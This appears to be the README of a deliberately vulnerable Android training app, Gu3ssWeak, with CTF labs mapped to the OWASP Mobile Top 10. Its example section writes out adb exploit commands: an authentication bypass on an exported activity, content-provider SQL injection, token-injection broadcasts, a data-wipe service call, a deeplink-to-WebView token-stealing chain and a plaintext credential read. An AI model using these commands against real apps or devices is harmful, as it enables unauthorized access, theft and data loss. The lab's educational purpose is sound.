
Deliberately vulnerable Android app for mobile security research and bug bounty practice - OWASP Mobile Top 10
A deliberately vulnerable Android application for mobile security research, bug bounty practice, and CTF-style learning. Contains 21 documented vulnerabilities mapped to the OWASP Mobile Top 10.
git clone [email protected]:b4sith-sec/Gu3ssWeak.git
cd Gu3ssWeak
./gradlew assembleDebug
adb install -r app/build/outputs/apk/debug/app-debug.apk
Launch the app, work through each lab, capture flags, and submit them on the in-app CTF scoreboard.
| Category | Vulnerabilities | Flags |
|---|---|---|
| WebView | WV-01 to WV-05 | 5 |
| Deeplink | DL-01 to DL-04, DL-CHAIN | 5 |
| Auth / SQL Injection | SQL-01 | 1 |
| Admin Panel | AP-01 to AP-04 | 2 |
| ContentProvider | CP-01 | 1 |
| Broadcast Receiver | BR-01 to BR-03 | 2 |
| Service | SV-01, SV-02a, SV-02b | 2 |
| Network Interception | NET-01 | 1 |
| Banking / OTP | OTP-01 | 1 |
| LFI | LFI-01 | 1 |
| Storage | STORE-01 | 1 |
| XSS | XSS-01, XSS-02 | 2 |
20 flags total, plus a master flag awarded for capturing all of them.
| Lab List | CTF Scoreboard |
|---|---|
| lab |
# Admin panel - exported, no permission
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity --ez is_authenticated true
adb shell "content query --uri content://com.gu3sswe4k.app.contacts/contacts/1 --where \"1) OR (1=1\""
# Token injection via broadcast
adb shell am broadcast -a com.gu3sswe4k.app.SEND_TOKEN --es token FAKE --es user attacker
# Data wipe via exported service
adb shell am startservice -n com.gu3sswe4k.app/.services.DataSyncService --es action wipe_user_data
# Deeplink to WebView RCE chain
adb shell am start -a android.intent.action.VIEW -d "vulndroid://settings?redirect=com.gu3sswe4k.app.activities.WebViewActivity&url=javascript:VulnBridge.stealToken()"
# Read plaintext stored credentials
adb shell run-as com.gu3sswe4k.app cat /data/data/com.gu3sswe4k.app/shared_prefs/login_prefs.xml
# Watch for logged secrets
adb logcat | grep Gu3ssWeak
This project is purely educational. All vulnerabilities are intentional and documented. Techniques shown here apply to real apps, but only test systems you own or are authorized to test. See SECURITY.md for the full disclaimer and responsible disclosure guidance.
MIT - see LICENSE.